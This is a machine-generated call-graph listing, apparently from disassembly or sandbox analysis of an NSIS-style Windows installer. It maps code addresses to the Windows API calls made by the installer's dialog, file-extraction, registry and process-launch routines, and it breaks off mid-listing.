ShowWindow 3535->3540 3541 405909 3535->3541 3536 40576f 3545 405776 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3536->3545 3538 4058f0 3537->3538 3539 405944 3537->3539 3542 4058f8 3538->3542 3543 40591e ShowWindow 3538->3543 3539->3541 3553 405952 SendMessageW 3539->3553 3578 4044ce SendMessageW 3540->3578 3544 404500 8 API calls 3541->3544 3547 404472 SendMessageW 3542->3547 3549 405930 3543->3549 3550 40593e 3543->3550 3548 405917 3544->3548 3551 4057e4 3545->3551 3552 4057c8 SendMessageW SendMessageW 3545->3552 3547->3541 3554 40559f 24 API calls 3549->3554 3555 404472 SendMessageW 3550->3555 3556 4057f7 3551->3556 3557 4057e9 SendMessageW 3551->3557 3552->3551 3553->3548 3558 40596b CreatePopupMenu 3553->3558 3554->3550 3555->3539 3560 404499 18 API calls 3556->3560 3557->3556 3559 40657a 17 API calls 3558->3559 3561 40597b AppendMenuW 3559->3561 3562 405807 3560->3562 3563 405998 GetWindowRect 3561->3563 3564 4059ab TrackPopupMenu 3561->3564 3565 405810 ShowWindow 3562->3565 3566 405844 GetDlgItem SendMessageW 3562->3566 3563->3564 3564->3548 3567 4059c6 3564->3567 3568 405833 3565->3568 3569 405826 ShowWindow 3565->3569 3566->3548 3570 40586b SendMessageW SendMessageW 3566->3570 3571 4059e2 SendMessageW 3567->3571 3577 4044ce SendMessageW 3568->3577 3569->3568 3570->3548 3571->3571 3572 4059ff OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3571->3572 3574 405a24 SendMessageW 3572->3574 3574->3574 3575 405a4d GlobalUnlock SetClipboardData CloseClipboard 3574->3575 3575->3548 3576->3536 3577->3566 3578->3537 3789 4028de 3790 4028e6 3789->3790 3791 4028ea FindNextFileW 3790->3791 3794 4028fc 3790->3794 3792 402943 3791->3792 3791->3794 3795 40653d lstrcpynW 3792->3795 3795->3794 3796 404ce0 3797 404cf0 3796->3797 3798 404d0c 3796->3798 3807 405b81 GetDlgItemTextW 3797->3807 3800 404d12 SHGetPathFromIDListW 3798->3800 3801 404d3f 3798->3801 3803 404d22 3800->3803 3806 404d29 SendMessageW 3800->3806 3802 404cfd SendMessageW 3802->3798 3805 40140b 2 API calls 3803->3805 3805->3806 3806->3801 3807->3802 3808 401563 3809 402ba4 3808->3809 3812 406484 wsprintfW 3809->3812 3811 402ba9 3812->3811 3813 401968 3814 402d84 17 API calls 3813->3814 3815 40196f 3814->3815 3816 402d84 17 API calls 3815->3816 3817 40197c 3816->3817 3818 402da6 17 API calls 3817->3818 3819 401993 lstrlenW 3818->3819 3820 4019a4 3819->3820 3824 4019e5 3820->3824 3825 40653d lstrcpynW 3820->3825 3822 4019d5 3823 4019da lstrlenW 3822->3823 3822->3824 3823->3824 3825->3822 3826 40166a 3827 402da6 17 API calls 3826->3827 3828 401670 3827->3828 3829 406873 2 API calls 3828->3829 3830 401676 3829->3830 3831 402aeb 3832 402d84 17 API calls 3831->3832 3833 402af1 3832->3833 3834 40657a 17 API calls 3833->3834 3835 40292e 3833->3835 3834->3835 3836 4026ec 3837 402d84 17 API calls 3836->3837 3844 4026fb 3837->3844 3838 402838 3839 402745 ReadFile 3839->3838 3839->3844 3840 4060b0 ReadFile 3840->3844 3841 402785 MultiByteToWideChar 3841->3844 3842 40283a 3858 406484 wsprintfW 3842->3858 3844->3838 3844->3839 3844->3840 3844->3841 3844->3842 3846 4027ab SetFilePointer MultiByteToWideChar 3844->3846 3847 40284b 3844->3847 3849 40610e SetFilePointer 3844->3849 3846->3844 3847->3838 3848 40286c SetFilePointer 3847->3848 3848->3838 3850 40612a 3849->3850 3853 406142 3849->3853 3851 4060b0 ReadFile 3850->3851 3852 406136 3851->3852 3852->3853 3854 406173 SetFilePointer 3852->3854 3855 40614b SetFilePointer 3852->3855 3853->3844 3854->3853 3855->3854 3856 406156 3855->3856 3857 4060df WriteFile 3856->3857 3857->3853 3858->3838 3859 40176f 3860 402da6 17 API calls 3859->3860 3861 401776 3860->3861 3862 401796 3861->3862 3863 40179e 3861->3863 3897 40653d lstrcpynW 3862->3897 3898 40653d lstrcpynW 3863->3898 3866 40179c 3870 4067c4 5 API calls 3866->3870 3867 4017a9 3868 405e0c 3 API calls 3867->3868 3869 4017af lstrcatW 3868->3869 3869->3866 3885 4017bb 3870->3885 3871 406873 2 API calls 3871->3885 3872 406008 2 API calls 3872->3885 3874 4017cd CompareFileTime 3874->3885 3875 40188d 3877 40559f 24 API calls 3875->3877 3876 401864 3878 40559f 24 API calls 3876->3878 3887 401879 3876->3887 3879 401897 3877->3879 3878->3887 3880 4032b4 31 API calls 3879->3880 3881 4018aa 3880->3881 3882 4018be SetFileTime 3881->3882 3883 4018d0 CloseHandle 3881->3883 3882->3883 3886 4018e1 3883->3886 3883->3887 3884 40657a 17 API calls 3884->3885 3885->3871 3885->3872 3885->3874 3885->3875 3885->3876 3885->3884 3888 40653d lstrcpynW 3885->3888 3893 405b9d MessageBoxIndirectW 3885->3893 3899 40602d GetFileAttributesW CreateFileW 3885->3899 3889 4018e6 3886->3889 3890 4018f9 3886->3890 3888->3885 3891 40657a 17 API calls 3889->3891 3892 40657a 17 API calls 3890->3892 3894 4018ee lstrcatW 3891->3894 3895 401901 3892->3895 3893->3885 3894->3895 3896 405b9d MessageBoxIndirectW 3895->3896 3896->3887 3897->3866 3898->3867 3899->3885 3900 401a72 3901 402d84 17 API calls 3900->3901 3902 401a7b 3901->3902 3903 402d84 17 API calls 3902->3903 3904 401a20 3903->3904 3905 401573 3906 401583 ShowWindow 3905->3906 3907 40158c 3905->3907 3906->3907 3908 402c2a 3907->3908 3909 40159a ShowWindow 3907->3909 3909->3908 3910 4023f4 3911 402da6 17 API calls 3910->3911 3912 402403 3911->3912 3913 402da6 17 API calls 3912->3913 3914 40240c 3913->3914 3915 402da6 17 API calls 3914->3915 3916 402416 GetPrivateProfileStringW 3915->3916 3917 4014f5 SetForegroundWindow 3918 402c2a 3917->3918 3919 401ff6 3920 402da6 17 API calls 3919->3920 3921 401ffd 3920->3921 3922 406873 2 API calls 3921->3922 3923 402003 3922->3923 3925 402014 3923->3925 3926 406484 wsprintfW 3923->3926 3926->3925 3927 401b77 3928 402da6 17 API calls 3927->3928 3929 401b7e 3928->3929 3930 402d84 17 API calls 3929->3930 3931 401b87 wsprintfW 3930->3931 3932 402c2a 3931->3932 3933 40167b 3934 402da6 17 API calls 3933->3934 3935 401682 3934->3935 3936 402da6 17 API calls 3935->3936 3937 40168b 3936->3937 3938 402da6 17 API calls 3937->3938 3939 401694 MoveFileW 3938->3939 3940 4016a7 3939->3940 3946 4016a0 3939->3946 3942 406873 2 API calls 3940->3942 3944 4022f6 3940->3944 3941 401423 24 API calls 3941->3944 3943 4016b6 3942->3943 3943->3944 3945 4062fd 36 API calls 3943->3945 3945->3946 3946->3941 3947 4019ff 3948 402da6 17 API calls 3947->3948 3949 401a06 3948->3949 3950 402da6 17 API calls 3949->3950 3951 401a0f 3950->3951 3952 401a16 lstrcmpiW 3951->3952 3953 401a28 lstrcmpW 3951->3953 3954 401a1c 3952->3954 3953->3954 3955 4022ff 3956 402da6 17 API calls 3955->3956 3957 402305 3956->3957 3958 402da6 17 API calls 3957->3958 3959 40230e 3958->3959 3960 402da6 17 API calls 3959->3960 3961 402317 3960->3961 3962 406873 2 API calls 3961->3962 3963 402320 3962->3963 3964 402331 lstrlenW lstrlenW 3963->3964 3968 402324 3963->3968 3966 40559f 24 API calls 3964->3966 3965 40559f 24 API calls 3969 40232c 3965->3969 3967 40236f SHFileOperationW 3966->3967 3967->3968 3967->3969 3968->3965 3968->3969 3970 401000 3971 401037 BeginPaint GetClientRect 3970->3971 3972 40100c DefWindowProcW 3970->3972 3974 4010f3 3971->3974 3977 401179 3972->3977 3975 401073 CreateBrushIndirect FillRect DeleteObject 3974->3975 3976 4010fc 3974->3976 3975->3974 3978 401102 CreateFontIndirectW 3976->3978 3979 401167 EndPaint 3976->3979 3978->3979 3980 401112 6 API calls 3978->3980 3979->3977 3980->3979 3981 401d81 3982 401d94 GetDlgItem 3981->3982 3983 401d87 3981->3983 3985 401d8e 3982->3985 3984 402d84 17 API calls 3983->3984 3984->3985 3987 402da6 17 API calls 3985->3987 3989 401dd5 GetClientRect LoadImageW SendMessageW 3985->3989 3987->3989 3988 401e33 3990 401e38 DeleteObject 3988->3990 3991 401e3f 3988->3991 3989->3988 3989->3991 3990->3991 3992 401503 3993 40150b 3992->3993 3995 40151e 3992->3995 3994 402d84 17 API calls 3993->3994 3994->3995 3996 402383 3997 40238a 3996->3997 4000 40239d 3996->4000 3998 40657a 17 API calls 3997->3998 3999 402397 3998->3999 4001 405b9d MessageBoxIndirectW 3999->4001 4001->4000 4002 402c05 SendMessageW 4003 402c2a 4002->4003 4004 402c1f InvalidateRect 4002->4004 4004->4003 4005 404f06 GetDlgItem GetDlgItem 4006 404f58 7 API calls 4005->4006 4012 40517d 4005->4012 4007 404ff2 SendMessageW 4006->4007 4008 404fff DeleteObject 4006->4008 4007->4008 4009 405008 4008->4009 4010 40503f 4009->4010 4013 40657a 17 API calls 4009->4013 4014 404499 18 API calls 4010->4014 4011 40525f 4015 40530b 4011->4015 4025 4052b8 SendMessageW 4011->4025 4045 405170 4011->4045 4012->4011 4016 4051ec 4012->4016 4059 404e54 SendMessageW 4012->4059 4019 405021 SendMessageW SendMessageW 4013->4019 4020 405053 4014->4020 4017 405315 SendMessageW 4015->4017 4018 40531d 4015->4018 4016->4011 4021 405251 SendMessageW 4016->4021 4017->4018 4027 405336 4018->4027 4028 40532f ImageList_Destroy 4018->4028 4043 405346 4018->4043 4019->4009 4024 404499 18 API calls 4020->4024 4021->4011 4022 404500 8 API calls 4026 40550c 4022->4026 4038 405064 4024->4038 4030 4052cd SendMessageW 4025->4030 4025->4045 4031 40533f GlobalFree 4027->4031 4027->4043 4028->4027 4029 4054c0 4034 4054d2 ShowWindow GetDlgItem ShowWindow 4029->4034 4029->4045 4033 4052e0 4030->4033 4031->4043 4032 40513f GetWindowLongW SetWindowLongW 4035 405158 4032->4035 4044 4052f1 SendMessageW 4033->4044 4034->4045 4036 405175 4035->4036 4037 40515d ShowWindow 4035->4037 4058 4044ce SendMessageW 4036->4058 4057 4044ce SendMessageW 4037->4057 4038->4032 4039 40513a 4038->4039 4042 4050b7 SendMessageW 4038->4042 4046 4050f5 SendMessageW 4038->4046 4047 405109 SendMessageW 4038->4047 4039->4032 4039->4035 4042->4038 4043->4029 4050 405381 4043->4050 4064 404ed4 4043->4064 4044->4015 4045->4022 4046->4038 4047->4038 4049 40548b 4051 405496 InvalidateRect 4049->4051 4054 4054a2 4049->4054 4052 4053af SendMessageW 4050->4052 4053 4053c5 4050->4053 4051->4054 4052->4053 4053->4049 4055 405439 SendMessageW SendMessageW 4053->4055 4054->4029 4073 404e0f 4054->4073 4055->4053 4057->4045 4058->4012 4060 404eb3 SendMessageW 4059->4060 4061 404e77 GetMessagePos ScreenToClient SendMessageW 4059->4061 4063 404eab 4060->4063 4062 404eb0 4061->4062 4061->4063 4062->4060 4063->4016 4076 40653d lstrcpynW 4064->4076 4066 404ee7 4077 406484 wsprintfW 4066->4077 4068 404ef1 4069 40140b 2 API calls 4068->4069 4070 404efa 4069->4070 4078 40653d lstrcpynW 4070->4078 4072 404f01 4072->4050 4079 404d46 4073->4079 4075 404e24 4075->4029 4076->4066 4077->4068 4078->4072 4080 404d5f 4079->4080 4081 40657a 17 API calls 4080->4081 4082 404dc3 4081->4082 4083 40657a 17 API calls 4082->4083 4084 404dce 4083->4084 4085 40657a 17 API calls 4084->4085 4086 404de4 lstrlenW wsprintfW SetDlgItemTextW 4085->4086 4086->4075 4087 404609 lstrlenW 4088 404628 4087->4088 4089 40462a WideCharToMultiByte 4087->4089 4088->4089 4090 40248a 4091 402da6 17 API calls 4090->4091 4092 40249c 4091->4092 4093 402da6 17 API calls 4092->4093 4094 4024a6 4093->4094 4107 402e36 4094->4107 4097 40292e 4098 4024de 4100 4024ea 4098->4100 4103 402d84 17 API calls 4098->4103 4099 402da6 17 API calls 4102 4024d4 lstrlenW 4099->4102 4101 402509 RegSetValueExW 4100->4101 4104 4032b4 31 API calls 4100->4104 4105 40251f RegCloseKey 4101->4105 4102->4098 4103->4100 4104->4101 4105->4097 4108 402e51 4107->4108 4111 4063d8 4108->4111 4112 4063e7 4111->4112 4113 4063f2 RegCreateKeyExW 4112->4113 4114 4024b6 4112->4114 4113->4114 4114->4097 4114->4098 4114->4099 4115 40498a 4116 4049b6 4115->4116 4117 4049c7 4115->4117 4176 405b81 GetDlgItemTextW 4116->4176 4119 4049d3 GetDlgItem 4117->4119 4124 404a32 4117->4124 4122 4049e7 4119->4122 4120 404b16 4174 404cc5 4120->4174 4178 405b81 GetDlgItemTextW 4120->4178 4121 4049c1 4123 4067c4 5 API calls 4121->4123 4126 4049fb SetWindowTextW 4122->4126 4127 405eb7 4 API calls 4122->4127 4123->4117 4124->4120 4128 40657a 17 API calls 4124->4128 4124->4174 4130 404499 18 API calls 4126->4130 4132 4049f1 4127->4132 4133 404aa6 SHBrowseForFolderW 4128->4133 4129 404b46 4134 405f14 18 API calls 4129->4134 4135 404a17 4130->4135 4131 404500 8 API calls 4136 404cd9 4131->4136 4132->4126 4140 405e0c 3 API calls 4132->4140 4133->4120 4137 404abe CoTaskMemFree 4133->4137 4138 404b4c 4134->4138 4139 404499 18 API calls 4135->4139 4141 405e0c 3 API calls 4137->4141 4179 40653d lstrcpynW 4138->4179 4142 404a25 4139->4142 4140->4126 4143 404acb 4141->4143 4177 4044ce SendMessageW 4142->4177 4146 404b02 SetDlgItemTextW 4143->4146 4151 40657a 17 API calls 4143->4151 4146->4120 4147 404a2b 4149 40690a 5 API calls 4147->4149 4148 404b63 4150 40690a 5 API calls 4148->4150 4149->4124 4158 404b6a 4150->4158 4152 404aea lstrcmpiW 4151->4152 4152->4146 4155 404afb lstrcatW 4152->4155 4153 404bab 4180 40653d lstrcpynW 4153->4180 4155->4146 4156 404bb2 4157 405eb7 4 API calls 4156->4157 4159 404bb8 GetDiskFreeSpaceW 4157->4159 4158->4153 4161 405e58 2 API calls 4158->4161 4163 404c03 4158->4163 4162 404bdc MulDiv 4159->4162 4159->4163 4161->4158 4162->4163 4164 404c74 4163->4164 4166 404e0f 20 API calls 4163->4166 4165 404c97 4164->4165 4167 40140b 2 API calls 4164->4167 4181 4044bb KiUserCallbackDispatcher 4165->4181 4168 404c61 4166->4168 4167->4165 4170 404c76 SetDlgItemTextW 4168->4170 4171 404c66 4168->4171 4170->4164 4173 404d46 20 API calls 4171->4173 4172 404cb3 4172->4174 4175 4048e3 SendMessageW 4172->4175 4173->4164 4174->4131 4175->4174 4176->4121 4177->4147 4178->4129 4179->4148 4180->4156 4181->4172 4182 40290b 4183 402da6 17 API calls 4182->4183 4184 402912 FindFirstFileW 4183->4184 4185 40293a 4184->4185 4188 402925 4184->4188 4190 406484 wsprintfW 4185->4190 4187 402943 4191 40653d lstrcpynW 4187->4191 4190->4187 4191->4188 4192 40190c 4193 401943 4192->4193 4194 402da6 17 API calls 4193->4194 4195 401948 4194->4195 4196 405c49 67 API calls 4195->4196 4197 401951 4196->4197 4198 40190f 4199 402da6 17 API calls 4198->4199 4200 401916 4199->4200 4201 405b9d MessageBoxIndirectW 4200->4201 4202 40191f 4201->4202 4203 401491 4204 40559f 24 API calls 4203->4204 4205 401498 4204->4205 4206 402891 4207 402898 4206->4207 4209 402ba9 4206->4209 4208 402d84 17 API calls 4207->4208 4210 40289f 4208->4210 4211 4028ae SetFilePointer 4210->4211 4211->4209 4212 4028be 4211->4212 4214 406484 wsprintfW 4212->4214 4214->4209 3144 403b12 3145 403b2a 3144->3145 3146 403b1c CloseHandle 3144->3146 3151 403b57 3145->3151 3146->3145 3149 405c49 67 API calls 3150 403b3b 3149->3150 3153 403b65 3151->3153 3152 403b2f 3152->3149 3153->3152 3154 403b6a FreeLibrary GlobalFree 3153->3154 3154->3152 3154->3154 4215 401f12 4216 402da6 17 API calls 4215->4216 4217 401f18 4216->4217 4218 402da6 17 API calls 4217->4218 4219 401f21 4218->4219 4220 402da6 17 API calls 4219->4220 4221 401f2a 4220->4221 4222 402da6 17 API calls 4221->4222 4223 401f33 4222->4223 4224 401423 24 API calls 4223->4224 4225 401f3a 4224->4225 4232 405b63 ShellExecuteExW 4225->4232 4227 401f82 4228 40292e 4227->4228 4233 4069b5 WaitForSingleObject 4227->4233 4230 401f9f CloseHandle 4230->4228 4232->4227 4234 4069cf 4233->4234 4235 4069e1 GetExitCodeProcess 4234->4235 4236 406946 2 API calls 4234->4236 4235->4230 4237 4069d6 WaitForSingleObject 4236->4237 4237->4234 4238 405513 4239 405523 4238->4239 4240 405537 4238->4240 4241 405580 4239->4241 4242 405529 4239->4242 4243 40553f IsWindowVisible 4240->4243 4249 405556 4240->4249 4244 405585 CallWindowProcW 4241->4244 4245 4044e5 SendMessageW 4242->4245 4243->4241 4246 40554c 4243->4246 4247 405533 4244->4247 4245->4247 4248 404e54 5 API calls 4246->4248 4248->4249 4249->4244 4250 404ed4 4 API calls 4249->4250 4250->4241 4251 402f93 4252 402fa5 SetTimer 4251->4252 4253 402fbe 4251->4253 4252->4253 4254 403013 4253->4254 4255 402fd8 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4253->4255 4255->4254 4256 401d17 4257 402d84 17 API calls 4256->4257 4258 401d1d IsWindow 4257->4258 4259 401a20 4258->4259 3155 403f9a 3156 403fb2 3155->3156 3157 404113 3155->3157 3156->3157 3158 403fbe 3156->3158 3159 404124 GetDlgItem GetDlgItem 3157->3159 3176 404164 3157->3176 3161 403fc9 SetWindowPos 3158->3161 3162 403fdc 3158->3162 3160 404499 18 API calls 3159->3160 3163 40414e SetClassLongW 3160->3163 3161->3162 3166 403fe5 ShowWindow 3162->3166 3167 404027 3162->3167 3168 40140b 2 API calls 3163->3168 3164 4041be 3172 40410e 3164->3172 3228 4044e5 3164->3228 3173 404100 3166->3173 3174 404005 GetWindowLongW 3166->3174 3169 404046 3167->3169 3170 40402f DestroyWindow 3167->3170 3168->3176 3178 40404b SetWindowLongW 3169->3178 3179 40405c 3169->3179 3177 404422 3170->3177 3171 401389 2 API calls 3180 404196 3171->3180 3250 404500 3173->3250 3174->3173 3175 40401e ShowWindow 3174->3175 3175->3167 3176->3164 3176->3171 3177->3172 3186 404453 ShowWindow 3177->3186 3178->3172 3179->3173 3183 404068 GetDlgItem 3179->3183 3180->3164 3184 40419a SendMessageW 3180->3184 3182 404424 DestroyWindow EndDialog 3182->3177 3187 404096 3183->3187 3188 404079 SendMessageW IsWindowEnabled 3183->3188 3184->3172 3185 40140b 2 API calls 3195 4041d0 3185->3195 3186->3172 3190 4040a3 3187->3190 3192 4040ea SendMessageW 3187->3192 3193 4040b6 3187->3193 3201 40409b 3187->3201 3188->3172 3188->3187 3189 40657a 17 API calls 3189->3195 3190->3192 3190->3201 3192->3173 3196 4040d3 3193->3196 3197 4040be 3193->3197 3194 4040d1 3194->3173 3195->3172 3195->3182 3195->3185 3195->3189 3199 404499 18 API calls 3195->3199 3219 404364 DestroyWindow 3195->3219 3231 404499 3195->3231 3200 40140b 2 API calls 3196->3200 3244 40140b 3197->3244 3199->3195 3202 4040da 3200->3202 3247 404472 3201->3247 3202->3173 3202->3201 3204 40424b GetDlgItem 3205 404260 3204->3205 3206 404268 ShowWindow KiUserCallbackDispatcher 3204->3206 3205->3206 3234 4044bb KiUserCallbackDispatcher 3206->3234 3208 404292 EnableWindow 3213 4042a6 3208->3213 3209 4042ab GetSystemMenu EnableMenuItem SendMessageW 3210 4042db SendMessageW 3209->3210 3209->3213 3210->3213 3213->3209 3235 4044ce SendMessageW 3213->3235 3236 403f7b 3213->3236 3239 40653d lstrcpynW 3213->3239 3215 40430a lstrlenW 3216 40657a 17 API calls 3215->3216 3217 404320 SetWindowTextW 3216->3217 3240 401389 3217->3240 3219->3177 3220 40437e CreateDialogParamW 3219->3220 3220->3177 3221 4043b1 3220->3221 3222 404499 18 API calls 3221->3222 3223 4043bc GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3222->3223 3224 401389 2 API calls 3223->3224 3225 404402 3224->3225 3225->3172 3226 40440a ShowWindow 3225->3226 3227 4044e5 SendMessageW 3226->3227 3227->3177 3229 4044fd 3228->3229 3230 4044ee SendMessageW 3228->3230 3229->3195 3230->3229 3232 40657a 17 API calls 3231->3232 3233 4044a4 SetDlgItemTextW 3232->3233 3233->3204 3234->3208 3235->3213 3237 40657a 17 API calls 3236->3237 3238 403f89 SetWindowTextW 3237->3238 3238->3213 3239->3215 3242 401390 3240->3242 3241 4013fe 3241->3195 3242->3241 3243 4013cb MulDiv SendMessageW 3242->3243 3243->3242 3245 401389 2 API calls 3244->3245 3246 401420 3245->3246 3246->3201 3248 404479 3247->3248 3249 40447f SendMessageW 3247->3249 3248->3249 3249->3194 3251 4045c3 3250->3251 3252 404518 GetWindowLongW 3250->3252 3251->3172 3252->3251 3253 40452d 3252->3253 3253->3251 3254 40455a GetSysColor 3253->3254 3255 40455d 3253->3255 3254->3255 3256 404563 SetTextColor 3255->3256 3257 40456d SetBkMode 3255->3257 3256->3257 3258 404585 GetSysColor 3257->3258 3259 40458b 3257->3259 3258->3259 3260 404592 SetBkColor 3259->3260 3261 40459c 3259->3261 3260->3261 3261->3251 3262 4045b6 CreateBrushIndirect 3261->3262 3263 4045af DeleteObject 3261->3263 3262->3251 3263->3262 4260 401b9b 4261 401ba8 4260->4261 4262 401bec 4260->4262 4265 401c31 4261->4265 4270 401bbf 4261->4270 4263 401bf1 4262->4263 4264 401c16 GlobalAlloc 4262->4264 4276 40239d 4263->4276 4281 40653d lstrcpynW 4263->4281 4267 40657a 17 API calls 4264->4267 4266 40657a 17 API calls 4265->4266 4265->4276 4268 402397 4266->4268 4267->4265 4274 405b9d MessageBoxIndirectW 4268->4274 4279 40653d lstrcpynW 4270->4279 4272 401c03 GlobalFree 4272->4276 4273 401bce 4280 40653d lstrcpynW 4273->4280 4274->4276 4277 401bdd 4282 40653d lstrcpynW 4277->4282 4279->4273 4280->4277 4281->4272 4282->4276 4283 40261c 4284 402da6 17 API calls 4283->4284 4285 402623 4284->4285 4288 40602d GetFileAttributesW CreateFileW 4285->4288 4287 40262f 4288->4287 3580 40259e 3591 402de6 3580->3591 3584 4025b1 3585 4025d9 RegEnumValueW 3584->3585 3586 4025cd RegEnumKeyW 3584->3586 3589 40292e 3584->3589 3587 4025f5 RegCloseKey 3585->3587 3588 4025ee 3585->3588 3586->3587 3587->3589 3588->3587 3592 402da6 17 API calls 3591->3592 3593 402dfd 3592->3593 3594 4063aa RegOpenKeyExW 3593->3594 3595 4025a8 3594->3595 3596 402d84 3595->3596 3597 40657a 17 API calls 3596->3597 3598 402d99 3597->3598 3598->3584 4289 40149e 4290 4014ac PostQuitMessage 4289->4290 4291 40239d 4289->4291 4290->4291 4292 4015a3 4293 402da6 17 API calls 4292->4293 4294 4015aa SetFileAttributesW 4293->4294 4295 4015bc 4294->4295 4296 401fa4 4297 402da6 17 API calls 4296->4297 4298 401faa 4297->4298 4299 40559f 24 API calls 4298->4299 4300 401fb4 4299->4300 4301 405b20 2 API calls 4300->4301 4302 401fba 4301->4302 4303 401fdd CloseHandle 4302->4303 4305 4069b5 5 API calls 4302->4305 4306 40292e 4302->4306 4303->4306 4307 401fcf 4305->4307 4307->4303 4309 406484 wsprintfW 4307->4309 4309->4303 4310 40202a 4311 402da6 17 API calls 4310->4311 4312 402031 4311->4312 4313 40690a 5 API calls 4312->4313 4314 402040 4313->4314 4315 40205c GlobalAlloc 4314->4315 4324 4020cc 4314->4324 4316 402070 4315->4316 4315->4324 4317 40690a 5 API calls 4316->4317 4318 402077 4317->4318 4319 40690a 5 API calls 4318->4319 4320 402081 4319->4320 4320->4324 4325 406484 wsprintfW 4320->4325 4322 4020ba 4326 406484 wsprintfW 4322->4326 4325->4322 4326->4324 4327 40252a 4328 402de6 17 API calls 4327->4328 4329 402534 4328->4329 4330 402da6 17 API calls 4329->4330 4331 40253d 4330->4331 4332 402548 RegQueryValueExW 4331->4332 4333 40292e 4331->4333 4334 402568 4332->4334 4337 40256e RegCloseKey 4332->4337 4334->4337 4338 406484 wsprintfW 4334->4338 4337->4333 4338->4337 4339 4021aa 4340 402da6 17 API calls 4339->4340 4341 4021b1 4340->4341 4342 402da6 17 API calls 4341->4342 4343 4021bb 4342->4343 4344 402da6 17 API calls 4343->4344 4345 4021c5 4344->4345 4346 402da6 17 API calls 4345->4346 4347 4021cf 4346->4347 4348 402da6 17 API calls 4347->4348 4349 4021d9 4348->4349 4350 402218 CoCreateInstance 4349->4350 4351 402da6 17 API calls 4349->4351 4354 402237 4350->4354 4351->4350 4352 401423 24 API calls 4353 4022f6 4352->4353 4354->4352 4354->4353 4355 403baa 4356 403bb5 4355->4356 4357 403bbc GlobalAlloc 4356->4357 4358 403bb9 4356->4358 4357->4358 3264 40352d SetErrorMode GetVersionExW 3265 4035b7 3264->3265 3266 40357f GetVersionExW 3264->3266 3267 403610 3265->3267 3268 40690a 5 API calls 3265->3268 3266->3265 3269 40689a 3 API calls 3267->3269 3268->3267 3270 403626 lstrlenA 3269->3270 3270->3267 3271 403636 3270->3271 3272 40690a 5 API calls 3271->3272 3273 40363d 3272->3273 3274 40690a 5 API calls 3273->3274 3275 403644 3274->3275 3276 40690a 5 API calls 3275->3276 3280 403650 #17 OleInitialize SHGetFileInfoW 3276->3280 3279 40369d GetCommandLineW 3355 40653d lstrcpynW 3279->3355 3354 40653d lstrcpynW 3280->3354 3282 4036af 3283 405e39 CharNextW 3282->3283 3284 4036d5 CharNextW 3283->3284 3296 4036e6 3284->3296 3285 4037e4 3286 4037f8 GetTempPathW 3285->3286 3356 4034fc 3286->3356 3288 403810 3290 403814 GetWindowsDirectoryW lstrcatW 3288->3290 3291 40386a DeleteFileW 3288->3291 3289 405e39 CharNextW 3289->3296 3292 4034fc 12 API calls 3290->3292 3366 40307d GetTickCount GetModuleFileNameW 3291->3366 3294 403830 3292->3294 3294->3291 3297 403834 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3294->3297 3295 40387d 3299 403a59 ExitProcess OleUninitialize 3295->3299 3301 403932 3295->3301 3309 405e39 CharNextW 3295->3309 3296->3285 3296->3289 3298 4037e6 3296->3298 3300 4034fc 12 API calls 3297->3300 3450 40653d lstrcpynW 3298->3450 3303 403a69 3299->3303 3304 403a7e 3299->3304 3308 403862 3300->3308 3394 403bec 3301->3394 3458 405b9d 3303->3458 3306 403a86 GetCurrentProcess OpenProcessToken 3304->3306 3307 403afc ExitProcess 3304->3307 3312 403acc 3306->3312 3313 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3306->3313 3308->3291 3308->3299 3323 40389f 3309->3323 3316 40690a 5 API calls 3312->3316 3313->3312 3314 403941 3314->3299 3319 403ad3 3316->3319 3317 403908 3320 405f14 18 API calls 3317->3320 3318 403949 3322 405b08 5 API calls 3318->3322 3321 403ae8 ExitWindowsEx 3319->3321 3325 403af5 3319->3325 3324 403914 3320->3324 3321->3307 3321->3325 3326 40394e lstrcatW 3322->3326 3323->3317 3323->3318 3324->3299 3451 40653d lstrcpynW 3324->3451 3329 40140b 2 API calls 3325->3329 3327 40396a lstrcatW lstrcmpiW 3326->3327 3328 40395f lstrcatW 3326->3328 3327->3314 3330 40398a 3327->3330 3328->3327 3329->3307 3332 403996 3330->3332 3333 40398f 3330->3333 3336 405aeb 2 API calls 3332->3336 3335 405a6e 4 API calls 3333->3335 3334 403927 3452 40653d lstrcpynW 3334->3452 3338 403994 3335->3338 3339 40399b SetCurrentDirectoryW 3336->3339 3338->3339 3340 4039b8 3339->3340 3341 4039ad 3339->3341 3454 40653d lstrcpynW 3340->3454 3453 40653d lstrcpynW 3341->3453 3344 40657a 17 API calls 3345 4039fa DeleteFileW 3344->3345 3346 403a06 CopyFileW 3345->3346 3351 4039c5 3345->3351 3346->3351 3347 403a50 3349 4062fd 36 API calls 3347->3349 3348 4062fd 36 API calls 3348->3351 3349->3314 3350 40657a 17 API calls 3350->3351 3351->3344 3351->3347 3351->3348 3351->3350 3353 403a3a CloseHandle 3351->3353 3455 405b20 CreateProcessW 3351->3455 3353->3351 3354->3279 3355->3282 3357 4067c4 5 API calls 3356->3357 3359 403508 3357->3359 3358 403512 3358->3288 3359->3358 3360 405e0c 3 API calls 3359->3360 3361 40351a 3360->3361 3362 405aeb 2 API calls 3361->3362 3363 403520 3362->3363 3462 40605c 3363->3462 3466 40602d GetFileAttributesW CreateFileW 3366->3466 3368 4030bd 3386 4030cd 3368->3386 3467 40653d lstrcpynW 3368->3467 3370 4030e3 3371 405e58 2 API calls 3370->3371 3372 4030e9 3371->3372 3468 40653d lstrcpynW 3372->3468 3374 4030f4 GetFileSize 3375 4031ee 3374->3375 3393 40310b 3374->3393 3469 403019 3375->3469 3377 4031f7 3379 403227 GlobalAlloc 3377->3379 3377->3386 3506 4034e5 SetFilePointer 3377->3506 3480 4034e5 SetFilePointer 3379->3480 3381 40325a 3383 403019 6 API calls 3381->3383 3383->3386 3384 403210 3387 4034cf ReadFile 3384->3387 3385 403242 3481 4032b4 3385->3481 3386->3295 3389 40321b 3387->3389 3389->3379 3389->3386 3390 403019 6 API calls 3390->3393 3391 40324e 3391->3386 3391->3391 3392 40328b SetFilePointer 3391->3392 3392->3386 3393->3375 3393->3381 3393->3386 3393->3390 3503 4034cf 3393->3503 3395 40690a 5 API calls 3394->3395 3396 403c00 3395->3396 3397 403c06 3396->3397 3398 403c18 3396->3398 3527 406484 wsprintfW 3397->3527 3399 40640b 3 API calls 3398->3399 3400 403c48 3399->3400 3401 